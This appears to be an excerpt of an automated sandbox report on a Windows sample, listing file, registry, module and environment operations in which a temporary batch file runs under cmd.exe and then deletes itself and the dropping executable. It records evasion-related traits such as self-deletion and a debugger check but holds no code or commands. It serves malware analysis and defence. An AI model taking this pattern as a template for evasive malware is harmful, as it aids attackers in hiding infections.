| Create | C:\Users\EEBsYm5\AppData\Local\Temp\18144644.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
9 | |
| Create | C:\Users\EEBsYm5\AppData\Local\Temp\18144644.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Get Info | C:\Users\EEBsYm5\Desktop | type = file_attributes |
|
3 | |
| Get Info | "C:\Users\EEBsYm5\AppData\Local\Temp\18144644.bat" | type = file_attributes |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
9 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
17 | |
| Get Info | C:\Users\EEBsYm5\Desktop\3838612080743901967.exe | type = file_attributes |
|
2 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\18144644.bat | type = file_attributes |
|
2 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp | type = file_attributes |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
62 | |
| Open | STD_INPUT_HANDLE | - |
|
6 | |
| Open | STD_INPUT_HANDLE | - |
|
37 | |
| Open | STD_ERROR_HANDLE | - |
|
3 | |
| Read | STD_INPUT_HANDLE | size = 8191, size_out = 94 |
|
1 | |
| Read | STD_INPUT_HANDLE | size = 8191, size_out = 92 |
|
1 | |
| Read | STD_INPUT_HANDLE | size = 8191, size_out = 88 |
|
1 | |
| Read | STD_INPUT_HANDLE | size = 8191, size_out = 86 |
|
1 | |
| Read | STD_INPUT_HANDLE | size = 8191, size_out = 73 |
|
1 | |
| Read | STD_INPUT_HANDLE | size = 8191, size_out = 71 |
|
1 | |
| Read | STD_INPUT_HANDLE | size = 8191, size_out = 69 |
|
1 | |
| Read | STD_INPUT_HANDLE | size = 8191, size_out = 49 |
|
1 | |
| Read | STD_INPUT_HANDLE | size = 8191, size_out = 11 |
|
1 | |
| Read | STD_INPUT_HANDLE | size = 8191, size_out = 0 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 25 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 59 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 57 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 4 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 56 |
|
1 | |
| Write | STD_ERROR_HANDLE | size = 33 |
|
1 | |
| Delete | C:\Users\EEBsYm5\Desktop\3838612080743901967.exe | - |
|
1 | |
| Delete | C:\Users\EEBsYm5\AppData\Local\Temp\18144644.bat | - |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Module (12)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | ADVAPI32.dll | base_address = 0x76700000 |
|
1 | |
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x49fb0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x762224c2 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x7620ac6c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76213ea8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x76222732 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = SaferIdentifyLevel, address_out = 0x76722102 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = SaferComputeTokenFromLevel, address_out = 0x76723352 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = SaferCloseLevel, address_out = 0x76723825 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-11 09:24:09 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 145299 |
|
1 |
Environment (13)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
4 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\EEBsYm5\Desktop |
|
1 |
